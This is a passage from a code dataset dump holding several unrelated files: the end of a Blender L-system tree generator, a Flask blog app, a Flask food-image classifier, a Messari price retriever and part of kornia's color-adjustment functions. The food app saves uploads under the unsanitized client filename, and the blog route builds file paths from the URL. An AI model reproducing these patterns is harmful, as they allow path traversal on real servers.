#enlongating ratio\n lr = 1.229\n #widhth decrease ratio\n vr = 1.832\n \n lsys = []\n \n #AXIOM\n lsys.extend([(\"*\",[1]),(\"F\",[step]), (\"/\",[45]), (\"A\",[])])\n res = []\n base_w = len_radius_const*step\n \n #REWRITING\n #repat itr times, changing the values\n for num in range(itr):\n for x in lsys:\n \n #REWRITE RULES:\n if(x[0] == \"A\"):\n res += [(\"*\", [1/vr]), (\"F\", [step/2]), (\"[\", []), (\"&\", [a]), (\"F\", [step/2]), (\"A\", []), (\"}\", []),\n (\"/\", [d1]), (\"[\", []), (\"&\", [a]), (\"F\", [step/2]), (\"A\", []), (\"}\", []),\n (\"/\", [d2]), (\"[\", []), (\"&\", [a]), (\"F\", [step/2]), (\"A\", []), (\"}\", [])]\n \n elif(x[0] == \"F\"):\n l = x[1][0]\n \n res += [(\"F\", [l*lr])]\n \n elif(x[0] == \"*\"):\n w = x[1][0]\n print(w)\n res += [(\"*\", [1/(vr)])]\n \n else:\n res += [(x[0],x[1])]\n ## \n lsys = copy.deepcopy(res)\n res = []\n #end of principal branch\n lsys += [(\"}\",[])]\n \n return lsys\n\n\"\"\" SEQUENCE INTERPRETER \"\"\"\ndef parser(tree, i, info):\n \n \"\"\" RATIOS ARE ALSO DEFINED IN THE FUNCTION \"\"\"\n if(i == 0):\n seq = genSympodialSeq(info[0], info[1], info[2])\n tree.stem.turtle.width = info[1]*info[2]\n elif(i == 1):\n seq = genWillowSeq(info[0], info[1], info[2])\n tree.stem.turtle.width = info[1]*info[2]\n elif(i == 2): \n seq = genSeaweedSeq(info[0], info[1], info[2])\n tree.stem.turtle.width = info[1]*info[2]\n elif(i == 3): \n seq = genBushSeq(info[0], info[1], info[2])\n tree.stem.turtle.width = info[1]*info[2]\n elif(i == 4): \n seq = genNiceTreeSeq(info[0], info[1], info[2])\n tree.stem.turtle.width = info[1]*info[2]\n\n #transform sequence in steps\n for x in seq:\n ##interpreter rules\n \n if(x[0] == \"!\"): tree.setW(x[1][0])\n \n elif(x[0] == \"F\"): tree.move(x[1][0]);\n \n elif(x[0] == \"f\"): tree.move(x[1][0])\n \n elif(x[0] == \"+\"): tree.yaw((-1)*x[1][0])\n \n elif(x[0] == \"-\"): tree.yaw(x[1][0])\n \n elif(x[0] == \"&\"): tree.pitch((-1)*x[1][0])\n \n elif(x[0] == \"^\"): tree.pitch(x[1][0])\n \n elif(x[0] == \"/\"): tree.roll(x[1][0])\n \n elif(x[0] == \"n\"): tree.roll((-1)*x[1][0])\n \n elif(x[0] == \"[\"): tree.fork()\n \n elif(x[0] == \"]\"): tree.closeBranch()\n \n elif(x[0] == \"$\"): tree.resetOrientation()\n \n elif(x[0] == \"*\"): 
tree.multiplyW(x[1][0])\n \n elif(x[0] == \"%\"): tree.setW(0)\n \n elif(x[0] == \"}\"): tree.closeZBranch()\n\ndef run():\n \n \"\"\" DEFINE TYPE OF TREE \"\"\"\n \"\"\"\n i = 0: SYMPODIAL TREE\n 1: WILLOW\n 2: SEAWEED\n 3: BUSH\n 4: NICE TREE\n \"\"\"\n i = 1\n \n \"\"\" DEFINE INITIAL ATTRIBUTES OF THE TURTLE \"\"\" \n direction = mathutils.Vector([0.0, 0.0, 1.0])\n position = mathutils.Vector([0.0, 0.0, 0.0])\n right = mathutils.Vector([-1.0, 0.0, 0.0])\n \n \"\"\" DEFINE TROPISM VECTOR \"\"\"\n \"\"\" EACH CORDINATE WITH ABSOLUTE VALUE FROM 0 TO 100 (SOME, LIKE THE WIDOW, ARE MORE SENSITIVE)\"\"\"\n tropism = mathutils.Vector([-6.5, 0.0, 00.0])\n \n \"\"\" DEFINE NUMBER OF ITERATIONS\"\"\"\n \"\"\"\n BEST ITERATIONS OF EACH TREE:\n SYMPODIAL: 9\n WILLOW: 8\n SEAWEED: 3\n BUSH: 4\n NICE TREE: 7 \n \"\"\"\n itr = 8\n \n \"\"\" DEFINE STEP \"\"\"\n \"\"\" 10 ~ 20 is a good value \"\"\"\n step = 10\n \n \"\"\" DEFINE THE BASE_WIDTH/STEP RATIO \"\"\"\n \"\"\" \n GOOD VALUES\n SYMPODIAL: 1\n WILLOW: 3\n SEAWEED: 0.5\n BUSH: 0.8\n NICE TREE: 20 \n \"\"\"\n ratio = 3\n \n tree = Tree(Turtle(direction, position, right, 0.0), tropism, step)\n parser(tree, i, [itr, step, ratio]) \n\n \n\n\nrun()\n\n\n","repo_name":"antoniospg/S3D-ASSIGNMENT","sub_path":"Blender-Assignment/L-TREES.py","file_name":"L-TREES.py","file_ext":"py","file_size_in_byte":19372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40817337960","text":"# ----------------------------------------------------------------------------#\n# Imports\n# ----------------------------------------------------------------------------#\n\nfrom flask import Flask, render_template, request\nimport json\nimport os\nimport sha3\nimport re\nimport markdown\nimport datetime\n\n# ----------------------------------------------------------------------------#\n# App Config.\n# ----------------------------------------------------------------------------#\n\napp = Flask(__name__)\n# set static and template folders\napp.template_folder = \"frontend/html\"\napp.static_folder = \"frontend/assets\"\n\n\n# ----------------------------------------------------------------------------#\n# Routes.\n# ----------------------------------------------------------------------------#\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/blog2\")\ndef blog2():\n return render_template(\"blog.html\")\n\n\n@app.route(\"/help\")\ndef help():\n return render_template(\"help.html\")\n\n\n@app.route(\"/learn\")\ndef learn():\n return render_template(\"learn.html\")\n\n\n@app.route(\"/donate\")\ndef donate():\n return render_template(\"donate.html\")\n\n\n@app.route(\"/post\")\ndef post():\n return render_template(\"post.html\")\n\n\n# ----------------------------------------------------------------------------#\n# Blog\n# ----------------------------------------------------------------------------#\n\n\n@app.route(\"/blog/\", methods=[\"GET\"])\ndef blog_post(post):\n base_path = app.template_folder + \"/blog/\" + post + \"/\"\n try:\n post_html, details = get_blog_post(base_path, post)\n except FileNotFoundError:\n return \"404: Don't mess around with the url pls :)\", 404\n\n # render the post\n return render_template(\n \"blog/blogpost.html\",\n post=post,\n post_html=post_html,\n details=details,\n )\n\n\n@app.route(\"/blog\", methods=[\"GET\"])\ndef blog():\n # get all blog posts and their 
preview content\n posts = get_all_blog_content()\n return render_template(\"/blog/blog.html\", posts=posts)\n\n\ndef get_all_blog_content():\n posts = []\n for post in os.listdir(app.template_folder + \"/blog/\"):\n # skip if not a directory\n if not os.path.isdir(app.template_folder + \"/blog/\" + post):\n continue\n\n # call blog_post() to generate content_preview.html file\n if not os.path.exists(\n app.template_folder + \"/blog/\" + post + \"/content_preview.html\"\n ) or not os.path.exists(app.template_folder + \"/blog/\" + post + \"/details.json\"):\n # generate content_preview.html file (and everything else)\n get_blog_post(app.template_folder + \"/blog/\" + post + \"/\", post)\n\n with open(app.template_folder + \"/blog/\" + post + \"/details.json\") as f:\n details = json.load(f)\n\n if details[\"isPublished\"] == \"true\":\n posts.append(\n {\n \"slug\": details[\"slug\"],\n \"author\": details[\"author\"],\n \"tags\": details[\"tags\"],\n \"date\": details[\"date\"],\n \"content_preview\": open(\n app.template_folder + \"/blog/\" + post + \"/content_preview.html\"\n ).read(),\n \"post\": post,\n }\n )\n\n # sort posts by date\n posts = sorted(posts, key=lambda k: k[\"date\"], reverse=True)\n return posts\n\ndef get_blog_post(post_path, post):\n # load details.json file if it exists, else use default values & save to file\n if os.path.exists(post_path + \"details.json\"):\n with open(post_path + \"details.json\") as f:\n details = json.load(f)\n print(f\"DETAILS: {details}\")\n else:\n today = datetime.datetime.now()\n details = {\n \"slug\": post,\n \"author\": \"Nadia Hayajneh\",\n \"tags\": \"\",\n \"isPublished\": \"true\",\n \"overwriteHtml\": \"true\",\n \"date\": today.strftime(\"%Y-%m-%d\"),\n \"contentHash\": \"\",\n }\n # save details.json file\n with open(post_path + \"details.json\", \"w\") as f:\n json.dump(details, f, indent=4)\n\n # CHECK IF THE CONTENT HAS CHANGED\n content_md = open(post_path + \"content.md\", \"r\").read()\n content_hash = sha3.keccak_256(content_md.encode(\"utf-8\")).hexdigest()\n rerender_flag = False\n # compare to existing hash in details.json\n if details[\"contentHash\"] != content_hash:\n details[\"contentHash\"] = content_hash\n with open(post_path + \"details.json\", \"w\") as f:\n json.dump(details, f, indent=4)\n rerender_flag = True and details[\"overwriteHtml\"]\n\n if not os.path.exists(post_path + \"content.html\") or rerender_flag:\n # takes in blog//content.md, turns it into html and renders it\n post_html = markdown.markdown(open(post_path + \"content.md\").read())\n\n # DO NOT TOUCHHHHH\n # replace all internal links so they point to the correct place\n pattern = re.compile(r'src=\"(?!(https://|http://))([^\"]*)\"')\n post_html = pattern.sub(r'src=\"../src/html/blog/' + post + r'/\\2\"', post_html)\n\n # save html to file\n with open(post_path + \"content.html\", \"w\") as f:\n f.write(post_html)\n else:\n post_html = open(post_path + \"content.html\").read()\n\n if not os.path.exists(post_path + \"content_preview.html\") or rerender_flag:\n post_html = open(post_path + \"content.html\").read()\n # if no '\")[p_counter] + \"
<p>' in post_html, fall back to the whole html as the preview\n        if \"<p>\" not in post_html:\n            content_preview = post_html\n        else:\n            content_preview = \"\"\n            p_counter = 0\n            for _ in post_html.split(\"<p>\")[1:]:\n                p_counter += 1\n                if p_counter > 4:  # max 4 paragraphs\n                    break\n                content_preview += post_html.split(\"<p>\")[p_counter] + \"<p>
\"\n\n print(f\"CONTENT PREVIEW: {content_preview}\")\n # save content_preview.html file\n with open(post_path + \"content_preview.html\", \"w\") as f:\n f.write(content_preview)\n \n return post_html, details\n\n\n# ----------------------------------------------------------------------------#\n# Launch.\n# ----------------------------------------------------------------------------#\n\n\ndef main():\n # generate all blog posts\n get_all_blog_content()\n\n app.config.update(\n DEBUG=True,\n TEMPLATES_AUTO_RELOAD=True,\n )\n app.run()\n\n# Default port:\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"nadiahay/vegan","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"30561871745","text":"# -*- coding: utf-8 -*-\nimport os\nfrom flask import Flask, request, render_template\nfrom tensorflow import keras\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\nimport numpy as np\n\napp = Flask(__name__, static_folder='static')\n\n# 加载模型和类别列表\nmodel_path = \"H:/Ceshi/Food/models/model.h5\"\nclasses_path = \"H:/Ceshi/Food/classes.txt\"\nmodel = keras.models.load_model(model_path)\nwith open(classes_path) as f:\n classes = f.read().splitlines()\n# -*- coding: utf-8 -*-\nimport os\nfrom flask import Flask, request, render_template\nfrom tensorflow import keras\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\nimport numpy as np\n\napp = Flask(__name__, static_folder='static')\n\n# 设置上传文件目录\nupload_folder = 'H:/Ceshi/Food/static'\napp.config['UPLOAD_FOLDER'] = upload_folder\n\n# 加载模型和类别列表\nmodel_path = \"H:/Ceshi/Food/models/model.h5\"\nclasses_path = \"H:/Ceshi/Food/classes.txt\"\nmodel = keras.models.load_model(model_path)\nwith open(classes_path) as f:\n classes = f.read().splitlines()\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef classify_food():\n if request.method == 'POST':\n # 上传并预测图片\n if 'file' not in request.files:\n return render_template('index.html', error='No file selected')\n\n file = request.files['file']\n if file.filename == '':\n return render_template('index.html', error='No file selected')\n\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], file.filename))\n\n img = load_img(os.path.join(app.config['UPLOAD_FOLDER'], file.filename), target_size=(224, 224))\n img_array = img_to_array(img)\n processed_img = preprocess_img(img_array)\n processed_img = np.expand_dims(processed_img, axis=0)\n\n prediction = model.predict(processed_img)\n predicted_class = classes[np.argmax(prediction)]\n\n return render_template('result.html', image_file=file.filename, predicted_class=predicted_class)\n else:\n return render_template('index.html')\n\n\n# 图片预处理 \ndef preprocess_img(img): \n # 添加预处理代码\n # 在这里替换为适当的图像预处理逻辑\n processed_img = img # 示例:不进行任何预处理,直接返回原始图像\n return processed_img\n\n\nif __name__ == '__main__':\n app.run(debug=False)","repo_name":"cfagafaga/DishDecipher","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"12648228240","text":"import urllib.request\nimport json\nimport streamlit as st\nimport numpy as np\nimport pandas as pd\n\n# Constants for the API calls (used in URL header field)\nAPI_KEY = st.secrets[\"API_KEY\"]\nHEADER_VAL = \"x-messari-api-key\"\n\n# DataRetriever class to fetch data using the Messari API\n\n\nclass 
DataRetriever:\n\n def __init__(self, api_key):\n self.API_KEY = api_key # Initialize using the given API key\n\n def retrieve_currencies(self):\n # Placeholder dictionary to populate with data\n all_currencies = {}\n # Permanent URL for the API call to retrieve currencies\n # Defaulting to doing the 500 most popular currencies\n request_url = \"https://data.messari.io/api/v1/assets?limit=500&fields=id,slug,symbol,metrics/market_data/price_usd\"\n # Retrieve parsed JSON data\n currency_data = self.get_raw_data(request_url)\n # Ditch all the other stuff, and just read the currency slugs and names\n for item in currency_data[\"data\"]:\n all_currencies[item[\"symbol\"]] = item[\"slug\"]\n # Return the new dictionary to populate UI\n return all_currencies\n\n def get_market_data(self, currency, start_date, end_date):\n # Placeholder list to populate with amazing data from API\n historical_data = []\n # Create a beautiful query for the API call\n request_url = f\"https://data.messari.io/api/v1/assets/\" + currency + \\\n \"/metrics/price/time-series?start=\" + start_date + \\\n \"&end=\" + end_date + \"&interval=1d&order=ascending\"\n # Pull the raw JSON parsed data\n raw_data = self.get_raw_data(request_url)\n # Ditch all the other stuff, and just read the values\n retrieved_data = raw_data[\"data\"][\"values\"]\n # Create the new list with the time as key and closing price as value\n for item in retrieved_data:\n historical_data.append(item[4])\n # Conversions of data\n np_array = np.array(historical_data) # Convert to numpy array\n # Convert to pandas dataframe\n my_dataframe = pd.DataFrame(np_array, columns=['close'])\n my_dataframe['returns'] = 100 * \\\n np.log(my_dataframe['close']).diff() # Calculate returns\n my_dataframe = my_dataframe['returns'].dropna() # Drop NaN values\n returns = my_dataframe # Change the naming of the dataframe\n # Return the dataframe for further calculations\n return returns\n\n def get_raw_data(self, url):\n # Open a new request with the given URL\n my_request = urllib.request.Request(url)\n # Fix the header fields, so we have access to the API\n my_request.add_header(HEADER_VAL, API_KEY)\n # Read all that juicy data\n raw_data = urllib.request.urlopen(my_request).read()\n # Let Python turn the json into something useful\n parsed_data = json.loads(raw_data)\n # Return the parsed data\n return parsed_data\n","repo_name":"skrunsky/python-project","sub_path":"data_retriever.py","file_name":"data_retriever.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"35004409436","text":"from typing import Union, Optional\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom kornia.augmentation.utils import _transform_input3d\nfrom kornia.color.hsv import rgb_to_hsv, hsv_to_rgb\nfrom kornia.utils.image import _to_bchw\nfrom kornia.constants import pi\n\n\n__all__ = [\n \"adjust_brightness\",\n \"adjust_contrast\",\n \"adjust_gamma\",\n \"adjust_hue\",\n \"adjust_saturation\",\n \"adjust_hue_raw\",\n \"adjust_saturation_raw\",\n \"solarize\",\n \"equalize\",\n \"equalize3d\",\n \"posterize\",\n \"sharpness\",\n \"AdjustBrightness\",\n \"AdjustContrast\",\n \"AdjustGamma\",\n \"AdjustHue\",\n \"AdjustSaturation\",\n]\n\n\ndef adjust_saturation_raw(input: torch.Tensor, saturation_factor: Union[float, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Adjust color saturation of an image. 
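The `get_market_data` method shown above turns daily closing prices into percentage log returns via `100 * np.log(close).diff()`. A tiny self-contained check of that transformation, using made-up prices rather than live Messari data:

```python
import numpy as np
import pandas as pd

closes = pd.Series([100.0, 105.0, 102.0], name="close")
returns = (100 * np.log(closes).diff()).dropna()
# ln(105/100) -> ~4.879 %, ln(102/105) -> ~-2.899 %
print(returns.round(3).tolist())  # [4.879, -2.899]
```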
Expecting input to be in hsv format already.\n\n See :class:`~kornia.color.AdjustSaturation` for details.\n \"\"\"\n\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not isinstance(saturation_factor, (float, torch.Tensor,)):\n raise TypeError(f\"The saturation_factor should be a float number or torch.Tensor.\"\n f\"Got {type(saturation_factor)}\")\n\n if isinstance(saturation_factor, float):\n saturation_factor = torch.tensor([saturation_factor])\n\n saturation_factor = saturation_factor.to(input.device).to(input.dtype)\n\n if (saturation_factor < 0).any():\n raise ValueError(f\"Saturation factor must be non-negative. Got {saturation_factor}\")\n\n for _ in input.shape[1:]:\n saturation_factor = torch.unsqueeze(saturation_factor, dim=-1)\n\n # unpack the hsv values\n h, s, v = torch.chunk(input, chunks=3, dim=-3)\n\n # transform the hue value and appl module\n s_out: torch.Tensor = torch.clamp(s * saturation_factor, min=0, max=1)\n\n # pack back back the corrected hue\n out: torch.Tensor = torch.cat([h, s_out, v], dim=-3)\n\n return out\n\n\ndef adjust_saturation(input: torch.Tensor, saturation_factor: Union[float, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Adjust color saturation of an image.\n\n See :class:`~kornia.color.AdjustSaturation` for details.\n \"\"\"\n\n # convert the rgb image to hsv\n x_hsv: torch.Tensor = rgb_to_hsv(input)\n\n # perform the conversion\n x_adjusted: torch.Tensor = adjust_saturation_raw(x_hsv, saturation_factor)\n\n # convert back to rgb\n out: torch.Tensor = hsv_to_rgb(x_adjusted)\n\n return out\n\n\ndef adjust_hue_raw(input: torch.Tensor, hue_factor: Union[float, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Adjust hue of an image. Expecting input to be in hsv format already.\n\n See :class:`~kornia.color.AdjustHue` for details.\n \"\"\"\n\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not isinstance(hue_factor, (float, torch.Tensor)):\n raise TypeError(f\"The hue_factor should be a float number or torch.Tensor in the range between\"\n f\" [-PI, PI]. Got {type(hue_factor)}\")\n\n if isinstance(hue_factor, float):\n hue_factor = torch.tensor([hue_factor])\n\n hue_factor = hue_factor.to(input.device).to(input.dtype)\n\n if ((hue_factor < -pi) | (hue_factor > pi)).any():\n raise ValueError(f\"Hue-factor must be in the range [-PI, PI]. Got {hue_factor}\")\n\n for _ in input.shape[1:]:\n hue_factor = torch.unsqueeze(hue_factor, dim=-1)\n\n # unpack the hsv values\n h, s, v = torch.chunk(input, chunks=3, dim=-3)\n\n # transform the hue value and appl module\n divisor: float = 2 * pi.item()\n h_out: torch.Tensor = torch.fmod(h + hue_factor, divisor)\n\n # pack back back the corrected hue\n out: torch.Tensor = torch.cat([h_out, s, v], dim=-3)\n\n return out\n\n\ndef adjust_hue(input: torch.Tensor, hue_factor: Union[float, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Adjust hue of an image.\n\n See :class:`~kornia.color.AdjustHue` for details.\n \"\"\"\n\n # convert the rgb image to hsv\n x_hsv: torch.Tensor = rgb_to_hsv(input)\n\n # perform the conversion\n x_adjusted: torch.Tensor = adjust_hue_raw(x_hsv, hue_factor)\n\n # convert back to rgb\n out: torch.Tensor = hsv_to_rgb(x_adjusted)\n\n return out\n\n\ndef adjust_gamma(input: torch.Tensor, gamma: Union[float, torch.Tensor],\n gain: Union[float, torch.Tensor] = 1.) 
-> torch.Tensor:\n r\"\"\"Perform gamma correction on an image.\n\n See :class:`~kornia.color.AdjustGamma` for details.\n \"\"\"\n\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not isinstance(gamma, (float, torch.Tensor)):\n raise TypeError(f\"The gamma should be a positive float or torch.Tensor. Got {type(gamma)}\")\n\n if not isinstance(gain, (float, torch.Tensor)):\n raise TypeError(f\"The gain should be a positive float or torch.Tensor. Got {type(gain)}\")\n\n if isinstance(gamma, float):\n gamma = torch.tensor([gamma])\n\n if isinstance(gain, float):\n gain = torch.tensor([gain])\n\n gamma = gamma.to(input.device).to(input.dtype)\n gain = gain.to(input.device).to(input.dtype)\n\n if (gamma < 0.0).any():\n raise ValueError(f\"Gamma must be non-negative. Got {gamma}\")\n\n if (gain < 0.0).any():\n raise ValueError(f\"Gain must be non-negative. Got {gain}\")\n\n for _ in input.shape[1:]:\n gamma = torch.unsqueeze(gamma, dim=-1)\n gain = torch.unsqueeze(gain, dim=-1)\n\n # Apply the gamma correction\n x_adjust: torch.Tensor = gain * torch.pow(input, gamma)\n\n # Truncate between pixel values\n out: torch.Tensor = torch.clamp(x_adjust, 0.0, 1.0)\n\n return out\n\n\ndef adjust_contrast(input: torch.Tensor,\n contrast_factor: Union[float, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Adjust Contrast of an image.\n\n See :class:`~kornia.color.AdjustContrast` for details.\n \"\"\"\n\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not isinstance(contrast_factor, (float, torch.Tensor,)):\n raise TypeError(f\"The factor should be either a float or torch.Tensor. \"\n f\"Got {type(contrast_factor)}\")\n\n if isinstance(contrast_factor, float):\n contrast_factor = torch.tensor([contrast_factor])\n\n contrast_factor = contrast_factor.to(input.device).to(input.dtype)\n\n if (contrast_factor < 0).any():\n raise ValueError(f\"Contrast factor must be non-negative. Got {contrast_factor}\")\n\n for _ in input.shape[1:]:\n contrast_factor = torch.unsqueeze(contrast_factor, dim=-1)\n\n # Apply contrast factor to each channel\n x_adjust: torch.Tensor = input * contrast_factor\n\n # Truncate between pixel values\n out: torch.Tensor = torch.clamp(x_adjust, 0.0, 1.0)\n\n return out\n\n\ndef adjust_brightness(input: torch.Tensor,\n brightness_factor: Union[float, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Adjust Brightness of an image.\n\n See :class:`~kornia.color.AdjustBrightness` for details.\n \"\"\"\n\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not isinstance(brightness_factor, (float, torch.Tensor,)):\n raise TypeError(f\"The factor should be either a float or torch.Tensor. 
\"\n f\"Got {type(brightness_factor)}\")\n\n if isinstance(brightness_factor, float):\n brightness_factor = torch.tensor([brightness_factor])\n\n brightness_factor = brightness_factor.to(input.device).to(input.dtype)\n\n for _ in input.shape[1:]:\n brightness_factor = torch.unsqueeze(brightness_factor, dim=-1)\n\n # Apply brightness factor to each channel\n x_adjust: torch.Tensor = input + brightness_factor\n\n # Truncate between pixel values\n out: torch.Tensor = torch.clamp(x_adjust, 0.0, 1.0)\n\n return out\n\n\ndef _solarize(input: torch.Tensor, thresholds: Union[float, torch.Tensor] = 0.5) -> torch.Tensor:\n r\"\"\" For each pixel in the image, select the pixel if the value is less than the threshold.\n Otherwise, subtract 1.0 from the pixel.\n\n Args:\n input (torch.Tensor): image or batched images to solarize.\n thresholds (float or torch.Tensor): solarize thresholds.\n If int or one element tensor, input will be solarized across the whole batch.\n If 1-d tensor, input will be solarized element-wise, len(thresholds) == len(input).\n\n Returns:\n torch.Tensor: Solarized images.\n \"\"\"\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not isinstance(thresholds, (float, torch.Tensor,)):\n raise TypeError(f\"The factor should be either a float or torch.Tensor. \"\n f\"Got {type(thresholds)}\")\n\n if isinstance(thresholds, torch.Tensor) and len(thresholds.shape) != 0:\n assert input.size(0) == len(thresholds) and len(thresholds.shape) == 1, \\\n f\"threshholds must be a 1-d vector of shape ({input.size(0)},). Got {thresholds}\"\n # TODO: I am not happy about this line, but no easy to do batch-wise operation\n thresholds = thresholds.to(input.device).to(input.dtype)\n thresholds = torch.stack([x.expand(*input.shape[1:]) for x in thresholds])\n\n return torch.where(input < thresholds, input, 1.0 - input)\n\n\ndef solarize(input: torch.Tensor, thresholds: Union[float, torch.Tensor] = 0.5,\n additions: Optional[Union[float, torch.Tensor]] = None) -> torch.Tensor:\n r\"\"\"For each pixel in the image less than threshold, we add 'addition' amount to it and then clip the\n pixel value to be between 0 and 1.0. The value of 'addition' is between -0.5 and 0.5.\n\n Args:\n input (torch.Tensor): image tensor with shapes like (C, H, W) or (B, C, H, W) to solarize.\n thresholds (float or torch.Tensor): solarize thresholds.\n If int or one element tensor, input will be solarized across the whole batch.\n If 1-d tensor, input will be solarized element-wise, len(thresholds) == len(input).\n additions (optional, float or torch.Tensor): between -0.5 and 0.5. Default None.\n If None, no addition will be performed.\n If int or one element tensor, same addition will be added across the whole batch.\n If 1-d tensor, additions will be added element-wisely, len(additions) == len(input).\n\n Returns:\n torch.Tensor: Solarized images.\n \"\"\"\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not isinstance(thresholds, (float, torch.Tensor,)):\n raise TypeError(f\"The factor should be either a float or torch.Tensor. \"\n f\"Got {type(thresholds)}\")\n\n if isinstance(thresholds, float):\n thresholds = torch.tensor(thresholds)\n\n if additions is not None:\n if not isinstance(additions, (float, torch.Tensor,)):\n raise TypeError(f\"The factor should be either a float or torch.Tensor. 
\"\n f\"Got {type(additions)}\")\n\n if isinstance(additions, float):\n additions = torch.tensor(additions)\n\n assert torch.all((additions < 0.5) * (additions > -0.5)), \\\n f\"The value of 'addition' is between -0.5 and 0.5. Got {additions}.\"\n\n if isinstance(additions, torch.Tensor) and len(additions.shape) != 0:\n assert input.size(0) == len(additions) and len(additions.shape) == 1, \\\n f\"additions must be a 1-d vector of shape ({input.size(0)},). Got {additions}\"\n # TODO: I am not happy about this line, but no easy to do batch-wise operation\n additions = additions.to(input.device).to(input.dtype)\n additions = torch.stack([x.expand(*input.shape[1:]) for x in additions])\n input = input + additions\n input = input.clamp(0., 1.)\n\n return _solarize(input, thresholds)\n\n\ndef posterize(input: torch.Tensor, bits: Union[int, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Reduce the number of bits for each color channel. Non-differentiable function, uint8 involved.\n\n Args:\n input (torch.Tensor): image tensor with shapes like (C, H, W) or (B, C, H, W) to posterize.\n bits (int or torch.Tensor): number of high bits. Must be in range [0, 8].\n If int or one element tensor, input will be posterized by this bits.\n If 1-d tensor, input will be posterized element-wisely, len(bits) == input.shape[1].\n If n-d tensor, input will be posterized element-channel-wisely, bits.shape == input.shape[:len(bits.shape)]\n\n Returns:\n torch.Tensor: Image with reduced color channels.\n \"\"\"\n if not torch.is_tensor(input):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if isinstance(bits, int):\n bits = torch.tensor(bits)\n\n if not torch.all((bits >= 0) * (bits <= 8)) and bits.dtype == torch.int:\n raise ValueError(f\"bits must be integers within range [0, 8]. Got {bits}.\")\n\n # TODO: Make a differentiable version\n # Current version:\n # Ref: https://github.com/open-mmlab/mmcv/pull/132/files#diff-309c9320c7f71bedffe89a70ccff7f3bR19\n # Ref: https://github.com/tensorflow/tpu/blob/master/models/official/efficientnet/autoaugment.py#L222\n # Potential approach: implementing kornia.LUT with floating points\n # https://github.com/albumentations-team/albumentations/blob/master/albumentations/augmentations/functional.py#L472\n def _left_shift(input: torch.Tensor, shift: torch.Tensor):\n return ((input * 255).to(torch.uint8) * (2 ** shift)).to(input.dtype) / 255.\n\n def _right_shift(input: torch.Tensor, shift: torch.Tensor):\n return (input * 255).to(torch.uint8) / (2 ** shift).to(input.dtype) / 255.\n\n def _posterize_one(input: torch.Tensor, bits: torch.Tensor):\n # Single bits value condition\n if bits == 0:\n return torch.zeros_like(input)\n if bits == 8:\n return input.clone()\n bits = 8 - bits\n return _left_shift(_right_shift(input, bits), bits)\n\n if len(bits.shape) == 0 or (len(bits.shape) == 1 and len(bits) == 1):\n return _posterize_one(input, bits)\n\n res = []\n if len(bits.shape) == 1:\n input = _to_bchw(input)\n\n assert bits.shape[0] == input.shape[0], \\\n f\"Batch size must be equal between bits and input. Got {bits.shape[0]}, {input.shape[0]}.\"\n\n for i in range(input.shape[0]):\n res.append(_posterize_one(input[i], bits[i]))\n return torch.stack(res, dim=0)\n\n assert bits.shape == input.shape[:len(bits.shape)], \\\n f\"Batch and channel must be equal between bits and input. 
Got {bits.shape}, {input.shape[:len(bits.shape)]}.\"\n _input = input.view(-1, *input.shape[len(bits.shape):])\n _bits = bits.flatten()\n for i in range(input.shape[0]):\n res.append(_posterize_one(_input[i], _bits[i]))\n return torch.stack(res, dim=0).reshape(*input.shape)\n\n\ndef sharpness(input: torch.Tensor, factor: Union[float, torch.Tensor]) -> torch.Tensor:\n r\"\"\"Implements Sharpness function from PIL using torch ops.\n\n Args:\n input (torch.Tensor): image tensor with shapes like (C, H, W) or (B, C, H, W) to sharpen.\n factor (float or torch.Tensor): factor of sharpness strength. Must be above 0.\n If float or one element tensor, input will be sharpened by the same factor across the whole batch.\n If 1-d tensor, input will be sharpened element-wisely, len(factor) == len(input).\n\n Returns:\n torch.Tensor: Sharpened image or images.\n \"\"\"\n input = _to_bchw(input)\n if isinstance(factor, torch.Tensor):\n factor = factor.squeeze()\n if len(factor.size()) != 0:\n assert input.size(0) == factor.size(0), \\\n f\"Input batch size shall match with factor size if 1d array. Got {input.size(0)} and {factor.size(0)}\"\n else:\n factor = float(factor)\n kernel = torch.tensor([\n [1, 1, 1],\n [1, 5, 1],\n [1, 1, 1]\n ], dtype=input.dtype).view(1, 1, 3, 3).repeat(3, 1, 1, 1)\n\n # This shall be equivalent to depthwise conv2d:\n # Ref: https://discuss.pytorch.org/t/depthwise-and-separable-convolutions-in-pytorch/7315/2\n degenerate = 